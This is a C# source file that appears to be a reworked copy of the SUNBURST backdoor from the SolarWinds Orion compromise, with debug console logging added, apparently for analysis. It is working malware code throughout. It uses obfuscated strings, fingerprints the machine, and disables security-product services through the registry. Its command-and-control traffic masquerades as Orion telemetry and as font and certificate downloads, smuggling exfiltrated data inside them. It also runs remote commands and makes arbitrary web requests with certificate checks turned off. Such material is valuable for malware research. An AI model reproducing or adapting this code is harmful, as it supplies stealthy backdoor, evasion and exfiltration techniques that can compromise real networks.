public static string GetOSVersion(bool full)
{
if (osVersion == null || osInfo == null)
{
try
{
// Select * From Win32_OperatingSystem
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNor3L0gtSizJzEsPriwuSc0FAA==")))
{
ManagementObject managementObject = managementObjectSearcher.Get().Cast <ManagementObject>().FirstOrDefault <ManagementObject>();
// Caption
osInfo = managementObject.Properties[ZipHelper.Unzip("c04sKMnMzwMA")].Value.ToString();
// OSArchitecture
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8w92LErOyCxJTS4pLUoFAA==")].Value.ToString();
// InstallDate
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("88wrLknMyXFJLEkFAA==")].Value.ToString();
// Organization
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8y9KT8zLrEosyczPAwA=")].Value.ToString();
// RegisteredUser
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("C0pNzywuSS1KTQktTi0CAA==")].Value.ToString();
// Version
string text = managementObject.Properties[ZipHelper.Unzip("C0stKs7MzwMA")].Value.ToString();
osInfo = osInfo + ";" + text;
string[] array = text.Split(new char[]
{
'.'
});
osVersion = array[0] + "." + array[1];
}
}
catch (Exception)
{
osVersion = Environment.OSVersion.Version.Major + "." + Environment.OSVersion.Version.Minor;
// [E] {0} {1} {2}
osInfo = string.Format(ZipHelper.Unzip("i3aNVag2qFWoNgRio1oA"), Environment.OSVersion.VersionString, Environment.OSVersion.Version, Environment.Is64BitOperatingSystem ? 64 : 32);
}
}
if (!full)
{
return(osVersion);
}
return(osInfo);
}
private static bool SearchConfigurations()
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Entering SearchConfigurations()");
// Select * From Win32_SystemDriver
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Search Configurations: " + ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA=="));
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==")))
{
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
// PathName
ulong hash = Utilities.GetHash(Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()).ToLower());
if (!Settings.printy)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Checking property: " + ZipHelper.Unzip("C0gsyfBLzE0FAA==") + " GetFileName: " + Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()));
}
if ((Array.IndexOf<ulong>(Settings.configTimeStamps, hash) != -1))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Check for special drivers failed . Backdoor ConfigTimeStamps detected last GetFileName with hash " + hash + " [Use -r to Bypass]");
if (Settings.bypassr)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Because you are bypassing drivers/process check, the backdoor will continue. In a normal case teh backdoor stop execution. ");
}
else
{
return true;
}
}
}
}
return false;
}
private static bool SetManualMode(ServiceConfiguration.Service[] svcList)
{
try
{
// SYSTEM\CurrentControlSet\services
bool result = false;
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ZipHelper.Unzip("C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=")))
{
foreach (string text in registryKey.GetSubKeyNames())
{
foreach (ServiceConfiguration.Service service in svcList)
{
try
{
if (Utilities.GetHash(text.ToLower()) == service.timeStamp)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Interesting Service found " + text);
if (service.started)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Service is started " + text + " setting " + registryKey + "to false");
result = true;
RegistryHelper.SetKeyPermissions(registryKey, text, false);
}
else
{
using (RegistryKey registryKey2 = registryKey.OpenSubKey(text, true))
{
// Start
if (registryKey2.GetValueNames().Contains(ZipHelper.Unzip("Cy5JLCoBAA==")))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Setting " + text + " with value " + ZipHelper.Unzip("Cy5JLCoBAA=="));
// Start
registryKey2.SetValue(ZipHelper.Unzip("Cy5JLCoBAA=="), 4, RegistryValueKind.DWord);
result = true;
}
}
}
}
}
catch (Exception)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error in SetManualMode");
}
}
}
}
return result;
}
catch (Exception)
{
}
return false;
}
private HttpStatusCode CreateUploadRequest(HttpHelper.JobEngine job, int err, string response, out byte[] outData)
{
string text = this.httpHost;
byte[] array = null;
HttpHelper.HttpOipExMethods httpOipExMethods = (job != HttpHelper.JobEngine.Idle && job != HttpHelper.JobEngine.None) ? HttpHelper.HttpOipExMethods.Head : HttpHelper.HttpOipExMethods.Get;
outData = null;
try
{
if (!string.IsNullOrEmpty(response))
{
byte[] bytes = Encoding.UTF8.GetBytes(response);
byte[] bytes2 = BitConverter.GetBytes(err);
byte[] array2 = new byte[bytes.Length + bytes2.Length + this.customerId.Length];
Array.Copy(bytes, array2, bytes.Length);
Array.Copy(bytes2, 0, array2, bytes.Length, bytes2.Length);
Array.Copy(this.customerId, 0, array2, bytes.Length + bytes2.Length, this.customerId.Length);
array = HttpHelper.Inflate(array2);
httpOipExMethods = ((array.Length <= 10000) ? HttpHelper.HttpOipExMethods.Put : HttpHelper.HttpOipExMethods.Post);
}
if (!text.StartsWith(Uri.UriSchemeHttp + "://", StringComparison.OrdinalIgnoreCase) && !text.StartsWith(Uri.UriSchemeHttps + "://", StringComparison.OrdinalIgnoreCase))
{
text = Uri.UriSchemeHttps + "://" + text;
}
if (!text.EndsWith("/"))
{
text += "/";
}
text += this.GetBaseUri(httpOipExMethods, err);
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(text);
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Get || httpOipExMethods == HttpHelper.HttpOipExMethods.Head)
{
// If-None-Match
httpWebRequest.Headers.Add(ZipHelper.Unzip("80zT9cvPS9X1TSxJzgAA"), this.GetCache());
}
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Put && (this.requestMethod == HttpOipMethods.Get || this.requestMethod == HttpOipMethods.Head))
{
int[] intArray = this.GetIntArray((array != null) ? array.Length : 0);
int num = 0;
ulong num2 = (ulong)DateTime.UtcNow.Subtract(new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
num2 -= 300000UL;
string text2 = "{";
// "userId":"{0}",
text2 += string.Format(ZipHelper.Unzip("UyotTi3yTFGyUqo2qFXSAQA="), this.GetOrionImprovementCustomerId());
// "sessionId":"{0}",
text2 += string.Format(ZipHelper.Unzip("UypOLS7OzM/zTFGyUqo2qFXSAQA="), this.sessionId.ToString().Trim(new char[]
{
'{',
'}'
}));
// "steps":[
text2 += ZipHelper.Unzip("UyouSS0oVrKKBgA=");
for (int i = 0; i < intArray.Length; i++)
{
uint num3 = (uint)((this.random.Next(4) == 0) ? this.random.Next(512) : 0);
num2 += (ulong)num3;
byte[] array3;
if (intArray[i] > 0)
{
num2 |= 2UL;
array3 = array.Skip(num).Take(intArray[i]).ToArray <byte>();
num += intArray[i];
}
else
{
num2 &= 18446744073709551613UL;
array3 = new byte[this.random.Next(16, 28)];
for (int j = 0; j < array3.Length; j++)
{
array3[j] = (byte)this.random.Next();
}
}
text2 += "{";
// "Timestamp":"\/Date({0})\/",
text2 += string.Format(ZipHelper.Unzip("UwrJzE0tLknMLVCyUorRd0ksSdWoNqjVjNFX0gEA"), num2);
string str = text2;
// "Index":{0},
string format = ZipHelper.Unzip("U/LMS0mtULKqNqjVAQA=");
int num4 = this.mIndex;
this.mIndex = num4 + 1;
text2 = str + string.Format(format, num4);
// "EventType":"Orion",
text2 += ZipHelper.Unzip("U3ItS80rCaksSFWyUvIvyszPU9IBAA==");
// "EventName":"EventManager",
text2 += ZipHelper.Unzip("U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==");
// "DurationMs":{0},
text2 += string.Format(ZipHelper.Unzip("U3IpLUosyczP8y1Wsqo2qNUBAA=="), num3);
// "Succeeded":true,
text2 += ZipHelper.Unzip("UwouTU5OTU1JTVGyKikqTdUBAA==");
// "Message":"{0}"
text2 += string.Format(ZipHelper.Unzip("U/JNLS5OTE9VslKqNqhVAgA="), Convert.ToBase64String(array3).Replace("/", "\\/"));
text2 += ((i + 1 != intArray.Length) ? "}," : "}");
}
text2 += "]}";
// application/json
httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/TzyrOzwMA");
array = Encoding.UTF8.GetBytes(text2);
}
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Post || this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Post)
{
// application/octet-stream
httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/Tz08uSS3RLS4pSk3MBQA=");
}
return(this.CreateUploadRequestImpl(httpWebRequest, array, out outData));
}
catch (Exception)
{
}
return((HttpStatusCode)0);
}
private string GetBaseUriImpl(HttpHelper.HttpOipExMethods method, int err)
{
string text = null;
if (method == HttpHelper.HttpOipExMethods.Head)
{
text = ((ushort)err).ToString();
}
if (this.requestMethod == HttpOipMethods.Post)
{
string[] array = new string[]
{
// -root
ZipHelper.Unzip("0y3Kzy8BAA=="),
// -cert
ZipHelper.Unzip("001OLSoBAA=="),
// -universal_ca
ZipHelper.Unzip("0y3NyyxLLSpOzIlPTgQA"),
// -ca
ZipHelper.Unzip("001OBAA="),
// -primary_ca
ZipHelper.Unzip("0y0oysxNLKqMT04EAA=="),
// -timestamp
ZipHelper.Unzip("0y3JzE0tLknMLQAA"),
"",
// -global
ZipHelper.Unzip("003PyU9KzAEA"),
// -secureca
ZipHelper.Unzip("0y1OTS4tSk1OBAA=")
};
// pki/crl/{0}{1}{2}.crl
return(string.Format(ZipHelper.Unzip("K8jO1E8uytGvNqitNqytNqrVA/IA"), this.random.Next(100, 10000), array[this.random.Next(array.Length)], (text == null) ? "" : ("-" + text)));
}
if (this.requestMethod == HttpOipMethods.Put)
{
string[] array2 = new string[]
{
// Bold
ZipHelper.Unzip("c8rPSQEA"),
// BoldItalic
ZipHelper.Unzip("c8rPSfEsSczJTAYA"),
// ExtraBold
ZipHelper.Unzip("c60oKUp0ys9JAQA="),
// ExtraBoldItalic
ZipHelper.Unzip("c60oKUp0ys9J8SxJzMlMBgA="),
// Italic
ZipHelper.Unzip("8yxJzMlMBgA="),
// Light
ZipHelper.Unzip("88lMzygBAA=="),
// LightItalic
ZipHelper.Unzip("88lMzyjxLEnMyUwGAA=="),
// Regular
ZipHelper.Unzip("C0pNL81JLAIA"),
// SemiBold
ZipHelper.Unzip("C07NzXTKz0kBAA=="),
// SemiBoldItalic
ZipHelper.Unzip("C07NzXTKz0nxLEnMyUwGAA==")
};
string[] array3 = new string[]
{
// opensans
ZipHelper.Unzip("yy9IzStOzCsGAA=="),
// noto
ZipHelper.Unzip("y8svyQcA"),
// freefont
ZipHelper.Unzip("SytKTU3LzysBAA=="),
// SourceCodePro
ZipHelper.Unzip("C84vLUpOdc5PSQ0oygcA"),
// SourceSerifPro
ZipHelper.Unzip("C84vLUpODU4tykwLKMoHAA=="),
// SourceHanSans
ZipHelper.Unzip("C84vLUpO9UjMC07MKwYA"),
// SourceHanSerif
ZipHelper.Unzip("C84vLUpO9UjMC04tykwDAA==")
};
int num = this.random.Next(array3.Length);
if (num <= 1)
{
// fonts/woff/{0}-{1}-{2}-webfont{3}.woff2
return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA"), new object[]
{
this.random.Next(100, 10000),
array3[num],
array2[this.random.Next(array2.Length)].ToLower(),
text
}));
}
// fonts/woff/{0}-{1}-{2}{3}.woff2
return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA="), new object[]
{
this.random.Next(100, 10000),
array3[num],
array2[this.random.Next(array2.Length)],
text
}));
}
else
{
if (method <= HttpHelper.HttpOipExMethods.Head)
{
string text2 = "";
if (this.Valid(20))
{
// SolarWinds
text2 += ZipHelper.Unzip("C87PSSwKz8xLKQYA");
if (this.Valid(40))
{
// .CortexPlugin
text2 += ZipHelper.Unzip("03POLypJrQjIKU3PzAMA");
}
}
if (this.Valid(80))
{
// .Orion
text2 += ZipHelper.Unzip("0/MvyszPAwA=");
}
if (this.Valid(80))
{
string[] array4 = new string[]
{
// Wireless
ZipHelper.Unzip("C88sSs1JLS4GAA=="),
// UI
ZipHelper.Unzip("C/UEAA=="),
// Widgets
ZipHelper.Unzip("C89MSU8tKQYA"),
// NPM
ZipHelper.Unzip("8wvwBQA="),
// Apollo
ZipHelper.Unzip("cyzIz8nJBwA="),
// CloudMonitoring
ZipHelper.Unzip("c87JL03xzc/LLMkvysxLBwA=")
};
text2 = text2 + "." + array4[this.random.Next(array4.Length)];
}
if (this.Valid(30) || string.IsNullOrEmpty(text2))
{
string[] array5 = new string[]
{
// Nodes
ZipHelper.Unzip("88tPSS0GAA=="),
// Volumes
ZipHelper.Unzip("C8vPKc1NLQYA"),
// Interfaces
ZipHelper.Unzip("88wrSS1KS0xOLQYA"),
// Components
ZipHelper.Unzip("c87PLcjPS80rKQYA")
};
text2 = text2 + "." + array5[this.random.Next(array5.Length)];
}
if (this.Valid(30) || text != null)
{
text2 = string.Concat(new object[]
{
text2,
"-",
this.random.Next(1, 20),
".",
this.random.Next(1, 30)
});
if (text != null)
{
text2 = text2 + "." + ((ushort)err).ToString();
}
}
// swip/upd/
return(ZipHelper.Unzip("Ky7PLNAvLUjRBwA=") + text2.TrimStart(new char[]
{
'.'
// .xml
}) + ZipHelper.Unzip("06vIzQEA"));
}
if (method != HttpHelper.HttpOipExMethods.Put)
{
// swip/Upload.ashx
return(ZipHelper.Unzip("Ky7PLNAPLcjJT0zRSyzOqAAA"));
}
// swip/Events
return(ZipHelper.Unzip("Ky7PLNB3LUvNKykGAA=="));
}
}
private HttpHelper.JobEngine ParseServiceResponse(byte[] body, out string args)
{
args = null;
try
{
if (body == null || body.Length < 4)
{
return(HttpHelper.JobEngine.None);
}
HttpOipMethods httpOipMethods = this.requestMethod;
if (httpOipMethods != HttpOipMethods.Put)
{
if (httpOipMethods != HttpOipMethods.Post)
{
// "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}"
string[] value = (from Match m in Regex.Matches(Encoding.UTF8.GetString(body), ZipHelper.Unzip("U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA"), RegexOptions.IgnoreCase)
select m.Value).ToArray <string>();
body = Utilities.HexStringToByteArray(string.Join("", value).Replace("\"", string.Empty).Replace("-", string.Empty).Replace("{", string.Empty).Replace("}", string.Empty));
}
else
{
body = body.Skip(12).ToArray <byte>();
}
}
else
{
body = body.Skip(48).ToArray <byte>();
}
int num = BitConverter.ToInt32(body, 0);
body = body.Skip(4).Take(num).ToArray <byte>();
if (body.Length != num)
{
return(HttpHelper.JobEngine.None);
}
string[] array = Encoding.UTF8.GetString(HttpHelper.Deflate(body)).Trim().Split(new char[]
{
' '
}, 2);
HttpHelper.JobEngine jobEngine = (HttpHelper.JobEngine) int.Parse(array[0]);
args = ((array.Length > 1) ? array[1] : null);
return(Enum.IsDefined(typeof(HttpHelper.JobEngine), jobEngine) ? jobEngine : HttpHelper.JobEngine.None);
}
catch (Exception)
{
}
return(HttpHelper.JobEngine.None);
}
private static string GetNewOwnerName()
{
string text = null;
// S-1-5-
string value = ZipHelper.Unzip("C9Y11DXVBQA=");
// -500
string value2 = ZipHelper.Unzip("0zU1MAAA");
try
{
// Administrator
text = new NTAccount(ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier)).Value;
}
catch
{
}
if (string.IsNullOrEmpty(text) || !text.StartsWith(value, StringComparison.OrdinalIgnoreCase) || !text.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
{
// Select * From Win32_UserAccount
string queryString = ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA");
text = null;
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(queryString))
{
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
// SID
ManagementObject managementObject = (ManagementObject)managementBaseObject;
string text2 = managementObject.Properties[ZipHelper.Unzip("C/Z0AQA=")].Value.ToString();
// LocalAccount
// true
if (managementObject.Properties[ZipHelper.Unzip("88lPTsxxTE7OL80rAQA=")].Value.ToString().ToLower() == ZipHelper.Unzip("KykqTQUA") && text2.StartsWith(value, StringComparison.OrdinalIgnoreCase))
{
if (text2.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
{
text = text2;
break;
}
if (string.IsNullOrEmpty(text))
{
text = text2;
}
}
}
}
}
return(new SecurityIdentifier(text).Translate(typeof(NTAccount)).Value);
}
private static bool GetOrCreateUserID(out byte[] hash64)
{
string text = ReadDeviceInfo();
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Device info: " + text);
hash64 = new byte[8];
Array.Clear(hash64, 0, hash64.Length);
if (text == null)
{
return(false);
}
text += domain4;
try
{
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
// MachineGuid
text += RegistryHelper.GetValue(ZipHelper.Unzip("8/B2jYz38Xd29In3dXT28PRzjQn2dwsJdwxyjfHNTC7KL85PK4lxLqosKMlPL0osyKgEAA=="), ZipHelper.Unzip("801MzsjMS3UvzUwBAA=="), "");
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Registry/MachineGuid info: " + text);
}
catch
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error GetOrCreateUserID");
}
using (MD5 md = MD5.Create())
{
byte[] bytes = Encoding.ASCII.GetBytes(text);
byte[] array = md.ComputeHash(bytes);
if (array.Length < hash64.Length)
{
return(false);
}
for (int i = 0; i < array.Length; i++)
{
byte[] array2 = hash64;
int num = i % hash64.Length;
array2[num] ^= array[i];
}
}
return(true);
}
public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
{
result = null;
string requestUriString = args[0];
string s = args[1];
string text = (args.Length >= 3) ? args[2] : null;
string[] array = Encoding.UTF8.GetString(Convert.FromBase64String(s)).Split(new string[]
{
"\r\n",
"\r",
"\n"
}, StringSplitOptions.None);
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(requestUriString);
HttpWebRequest httpWebRequest2 = httpWebRequest;
httpWebRequest2.ServerCertificateValidationCallback =
(RemoteCertificateValidationCallback)Delegate.Combine(httpWebRequest2.ServerCertificateValidationCallback, new RemoteCertificateValidationCallback((object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors sslPolicyErrors) => true));
httpWebRequest.Proxy = proxy;
httpWebRequest.Timeout = 120000;
httpWebRequest.Method = array[0].Split(new char[]
{
' '
})[0];
foreach (string text2 in array)
{
int num = text2.IndexOf(':');
if (num > 0)
{
string text3 = text2.Substring(0, num);
string text4 = text2.Substring(num + 1).TrimStart(Array.Empty <char>());
if (!WebHeaderCollection.IsRestricted(text3))
{
httpWebRequest.Headers.Add(text2);
}
else
{
ulong hash = Utilities.GetHash(text3.ToLower());
// expect
if (hash <= 8873858923435176895UL)
{
// content-type
if (hash <= 6116246686670134098UL)
{
// accept
if (hash != 2734787258623754862UL)
{
// content-type
if (hash == 6116246686670134098UL)
{
httpWebRequest.ContentType = text4;
}
}
else
{
httpWebRequest.Accept = text4;
}
}
// user-agent
else if (hash != 7574774749059321801UL)
{
// expect
if (hash == 8873858923435176895UL)
{
// 100-continue
if (Utilities.GetHash(text4.ToLower()) == 1475579823244607677UL)
{
httpWebRequest.ServicePoint.Expect100Continue = true;
}
else
{
httpWebRequest.Expect = text4;
}
}
}
else
{
httpWebRequest.UserAgent = text4;
}
}
// connection
else if (hash <= 11266044540366291518UL)
{
// referer
if (hash != 9007106680104765185UL)
{
// connection
if (hash == 11266044540366291518UL)
{
ulong hash2 = Utilities.GetHash(text4.ToLower());
// keep-alive
httpWebRequest.KeepAlive = (hash2 == 13852439084267373191UL || httpWebRequest.KeepAlive);
// close
httpWebRequest.KeepAlive = (hash2 != 14226582801651130532UL && httpWebRequest.KeepAlive);
}
}
else
{
httpWebRequest.Referer = text4;
}
}
// if-modified-since
else if (hash != 15514036435533858158UL)
{
// date
if (hash == 16066522799090129502UL)
{
httpWebRequest.Date = DateTime.Parse(text4);
}
}
else
{
httpWebRequest.Date = DateTime.Parse(text4);
}
}
}
}
// {0} {1} HTTP/{2}
result += string.Format(ZipHelper.Unzip("qzaoVag2rFXwCAkJ0K82quUCAA=="), httpWebRequest.Method, httpWebRequest.Address.PathAndQuery, httpWebRequest.ProtocolVersion.ToString());
result = result + httpWebRequest.Headers.ToString() + "\n\n";
if (!string.IsNullOrEmpty(text))
{
using (Stream requestStream = httpWebRequest.GetRequestStream())
{
byte[] array3 = Convert.FromBase64String(text);
requestStream.Write(array3, 0, array3.Length);
}
}
using (WebResponse response = httpWebRequest.GetResponse())
{
result += string.Format("{0} {1}\n", (int)((HttpWebResponse)response).StatusCode, ((HttpWebResponse)response).StatusDescription);
result = result + response.Headers.ToString() + "\n";
using (Stream responseStream = response.GetResponseStream())
{
result += new StreamReader(responseStream).ReadToEnd();
}
}
}
public static void GetProcessByDescription(string[] args, out string result)
{
result = null;
if (args.Length == 0)
{
foreach (Process process in Process.GetProcesses())
{
// [{0,5}] {1}
result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNqzlAgA="), process.Id, Utilities.Quote(process.ProcessName));
}
return;
}
// Select * From Win32_Process
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=")))
{
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
string[] array = new string[]
{
string.Empty,
string.Empty
};
ManagementObject managementObject2 = managementObject;
// GetOwner
string methodName = ZipHelper.Unzip("c08t8S/PSy0CAA==");
object[] array2 = array;
object[] args2 = array2;
// [{0,5}] {1,-16} {2} {3,5} {4}\{5}
Convert.ToInt32(managementObject2.InvokeMethod(methodName, args2));
result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA="), new object[]
{
// ProcessID
// Name
// ParentProcessID
managementObject[ZipHelper.Unzip("CyjKT04tLvZ0AQA=")],
Utilities.Quote(managementObject[ZipHelper.Unzip("80vMTQUA")].ToString()),
managementObject[args[0]],
managementObject[ZipHelper.Unzip("C0gsSs0rCSjKT04tLvZ0AQA=")],
array[1],
array[0]
});
}
}
}
